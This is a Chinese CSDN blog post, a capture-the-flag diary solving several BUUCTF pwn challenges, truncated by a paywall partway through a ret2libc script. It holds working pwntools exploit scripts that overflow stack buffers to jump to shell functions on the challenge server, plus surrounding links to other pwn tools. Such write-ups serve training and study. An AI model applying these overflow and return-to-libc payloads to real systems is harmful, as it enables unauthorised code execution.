BUUCTF-PWN刷题日记(一)

最新推荐文章于 2024-05-16 11:03:26 发布
最新推荐文章于 2024-05-16 11:03:26 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: CTF BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45461609/article/details/105486759
版权

BUUCTF-PWN刷题日记


————励志要成为很厉害的二进制手的3nc0de

rip

简单的栈溢出
exp:

'''
Author:3nc0de
Date:2020/4/27
'''

#coding=utf-8
from pwn import*
#r = process('./pwn1')
r = remote('node3.buuoj.cn',port)
sys_addr = 0x401186
#address of fun
payload = 'a'*(0xf+8) + p64(sys_addr)
r.sendline(payload)
r.interactive()

warmup_csaw_2016

又是一道简单的栈溢出
PS:这题在攻防世界进阶区未提供ELF文件,用fuzz来做
在这里插入图片描述
运行程序输出shell函数的地址,IDA里可以直接看。
exp:

'''
Author:3nc0de
Date:2020/4/27
'''

#coding=utf-8
from pwn import*
#r = process('./warmup_csaw_2016')
r = remote('node3.buuoj.cn',port)
payload = 'a'*(0x40 + 8) + p64(0x40060d)
r.sendlineafter('>',payload)
r.interactive()

PS:偶然发现在ubuntu19.04中要把0x40060d改成0x40060e或者其他能执行到system函数的地址才能运行,暂时暂时没搞明白什么原因。

pwn1_sctf_2016

在这里插入图片描述
在这里插入图片描述
如果输入I,那么程序会把I变成you
s距离栈底的为0x3c(即60),而最大输入长度为32看似没有栈溢出风险,但想到上面的I->you也就是你的长度最大可变成32*3=96>60造成栈溢出
在这里插入图片描述
在这里插入图片描述
exp:

'''
Author:3nc0de
Date:2020/4/27
'''

from pwn import*
#r = process('./pwn1_sctf_2016')
r = remote('node3.buuoj.cn',port)
sys_addr = 0x08048f0d
payload = 'I'*20 + 'aaaa' + p32(sys_addr)
r.sendline(payload)
r.interactive()

jarvisoj_level1

和原题比较了一下,好像是打远程的时候接收出现了问题,不能用之前的栈溢出直接返回到callsystem函数上了,这里可以用ret2libc的方式来写

'''
Date:2020/4/30
Author:3nc0de
'''

from pwn import*
from LibcSearcher import LibcSearcher

elf = ELF('./level1')
r = remote('node3.buuoj.cn',port)

main = elf.symbols['main']
write = elf.plt['write']
read_got = elf.got['read']

#Step1:
# Display the address of read in GOT
# And make main_address become the return 
# address of write so that you can use
# stack_overflow again
payload = 'a'*140
payload += p32(write) 
payload += p32(main)  # return address
payload += p32(1)
payload += p32(read_got)
payload += p32(4)  # write(1,read_got,4)

#Step2:Get the address of read in g
最低0.47元/天 解锁文章
3nc0de
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Pwn——canary
weixin_44319142的博客
04-03 1786
canary 嘤嘤,不仅NX打开了,栈里面还有canary,这是什么鬼。。。。。 Canary保护机制的原理,是在一个函数入口处从fs段内获取一个随机值,一般存到EBP - 0x4(32位)或RBP - 0x8(64位)的位置。如果攻击者利用栈溢出修改到了这个值,导致该值与存入的值不一致,__stack_chk_fail函数将抛出异常并退出程序。Canary最高字节一般是\x00,防止由于其他...
PWN测试
07-18
信息安全PWN测试目:用于CTF的练习与PWN的学习,测试目。
pwn练习
WuMing_Z的博客
02-23 985
程序分析:main函数中只存在system("/bin/sh")函数,所以nc可直接拿到权限)nc指令:远程连接对方服务器,对方服务器有什么程序就会执行什么程序nc(ip + 端口号)例如在已给的靶机信息node5.buuoj.cn:29650中node5.buuoj.cn是域名,冒号后的29650是端口号(注意冒号要改为空格)然后直接cat flag 即可。
BUUCTF:Crypto 解析(一)
最新发布
Flag少侠的博客
05-16 2063
一眼就解密、MD5、URL 编码、看我回旋踢、摩丝、password、变异凯撒、Quoted-printable
BMZ公开赛PWN
qq_36495104的博客
12-28 1357
pwn1 exp #coding=utf-8 from pwn import * context.log_level="info" binary="./pwn1" elf=ELF(binary) #sh=process(binary) sh=remote("47.242.59.61",10000) vuln=0x80486AE memset_got=elf.got['memset'] sh.recvuntil("e to BMZCTF \n") payload=fmtstr_payload(10,{mem
pwn的习
2302_80368954的博客
02-20 356
F5 查看一下伪代码,在main函数中看到了gets函数 可以进行栈溢出,上面定义数组s可以存储15。在main函数中看到fgets,s的偏移量是60,再加上4,64位加上flag地址就可以返回。找到main函数,F5查看伪代码 然后发现gets漏洞,同时溢出为64。main函数中说当var的第13位是17 就可以访问到bin sh。32位 不可执行保护 地址随机化保护 栈保护。32位 不可执行保护 部分重定位保护。空格查看地址,地址为0x40118A。先查看一下文件保护 发现是64位。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举,支持功能和开发模块,同时将所有这些都打包在命令行界面中,并且易于使用和可扩展的类贝壳环境。 作者 功能支持 Credential ...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn shellcode 变形shellcode练手目,该目主要是利用三个节点来注入shellcode,考验解人对shellcode的熟悉程度。解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
2017湖湘杯pwn100的
11-30
2017湖湘杯pwn100的目的二进制文件和libc的二进制文件
学校的简单入门PWN
EternalBurning的博客
11-09 540
学校的简单入门PWN0x00 first try0x01 easy_second_try0x02 printf 0x00 first try exeinfo打开看一下,是32位的 看看有没有程序保护,估计是入门的缘故都没有程序保护: 用32位的ida打开, 要想拿到shell,就得让v6==99,而第11行的read()明显存在栈溢出,双击变量进入函数的栈界面 容易发现,s字符串的长度...
新手打pwn
m0_74736832的博客
07-05 954
攻击者可以使用格式化字符串的特性,将一个特定的值写入到可以修改canary的位置上,从而绕过检测。它是C语言中的标准函数库,提供了各种基础函数和数据类型的定义,以及多个常用功能的实现。弹出时的数据顺序:由于栈的"先进后出"原则,"pop"指令弹出的数据顺序与它们被"push"到栈中的顺序相反。当使用"pop"指令弹出数据时,栈指针会自动向下移动,指向新的栈顶位置。x86架构(如Intel和AMD处理器)中的"pop"指令:在x86汇编语言中,"pop"指令用于将栈顶的数据弹出并存储到目标操作数中。
ctf中pwn目总结
weixin_41038905的博客
11-16 4689
1.安装 pip install pwntools (python2) pip3 install pwntools (python3) 2.使用 Context设置 context是pwntools用来设置环境的功能。在很多时候,由于二进制文件的情况不同,我们可能需要进行一些环境设置才能够正常运行exp,比如有一些需要进行汇编,但是32的汇编和64的汇编不同,如果不设置context会导致一些问。一般来说我们设置context只需要简单的一句话: context(os='linux', arch='amd
第三周pwn
weixin_59339137的博客
12-04 394
pwn
buuctf中的一些pwn总结(不断更新)
PLpa的博客
08-19 4471
前言: 本文记录一些buuctf中不是很典型,但是仍然值得记录的pwn,以便于查看。 0x00:stkof——unlink 查看保护 查看IDA伪代码 增 自定义size,使用malloc分配。 删 free之后直接置空,难以利用。 改 重点来到改中,这里可以随意输入大小,然后根据输入的大小来为堆块中填入数据。这样就造成了堆溢出漏洞。 解思路 由于此存在堆溢出漏洞,我们又掌控着heap地址的存在位置,这样我们很容易就想到unlink漏洞来控制堆块。 由于程序本身的原因,我们先malloc一个堆
pwn的五道基础
lllwky的博客
03-27 6685
文章目录一:ret2text1:服务器地址与端口号2:传入参数3:参数的接收范围4:找到bin/sh所在的地址二:your_nc三:overflow四:printf1:找到如何进入/bin/sh2:找到sth的地址3:获得格式化字符串的偏移量五:rop拓展: 一:ret2text from pwn import * context.arch="amd64" io=remote("101.34.90.86",10002) secure_addr=0x400852 payload=b"a"*0x10+b"a"*
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值